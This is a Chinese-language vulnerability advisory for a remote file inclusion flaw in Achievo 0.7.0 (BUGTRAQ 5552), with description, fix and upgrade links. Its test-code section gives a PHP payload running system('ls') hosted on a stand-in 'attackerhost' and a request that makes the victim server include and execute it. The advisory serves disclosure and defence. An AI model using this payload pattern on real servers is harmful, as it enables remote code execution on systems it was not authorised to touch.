Achieva存在远程文件可包含问题发布时间:2002-08-29 更新时间:2002-08-29 严重程度:高 威胁程度:远程管理员权限 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:5552 受影响系统 Achieva Achieva 0.7 .0详细描述 Achieva包含用于生成JAVASCRIPT脚本的PHP脚本class.atkdateattribute.js.php,这个脚本配置多个PHP include_once()声明,用于调用函数库和获得配置信息,不过脚本调用的时候,没有对调用的文件路径进行判断,攻击者可以通过替换variable ($config_atkroot)变量值为远程主机文件而使脚本解析的时候执行远程主机上的文件。 测试代码 在自己控制的服务器上建立ls.txt: <?php system('ls'); ?> 调用如下请求: http://victimhost/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attackerhost/ls.txt? 解决方案 PHP配置中关闭'allow_url_fopen'和'register_globals'选项。 升级程序: Achieva Achieva 0.7 .0: Achieva Achieva 0.7.1: Achieva Achieva 0.7.2: Achieva Achieva 0.7.3: Achieva Achieva 0.8 .0 RC2: Achievo Upgrade achievo-stable-0.8.2.tar.gz http://ftp.achievo.org/pub/achievo/achievo-stable-0.8.2.tar.gz Achieva Achieva 0.8 .0 RC1: Achievo Upgrade achievo-stable-0.8.2.tar.gz http://ftp.achievo.org/pub/achievo/achievo-stable-0.8.2.tar.gz Achieva Achieva 0.8 .0: Achievo Upgrade achievo-stable-0.8.2.tar.gz http://ftp.achievo.org/pub/achievo/achievo-stable-0.8.2.tar.gz Achieva Achieva 0.8.1: Achievo Upgrade achievo-stable-0.8.2.tar.gz http://ftp.achievo.org/pub/achievo/achievo-stable-0.8.2.tar.gz 相关信息 Jeroen Latour <jlatour@calaquendi.net>. 参考:http://online.securityfocus.com/archive/1/288702 相关主页:http://www.achievo.org/ |
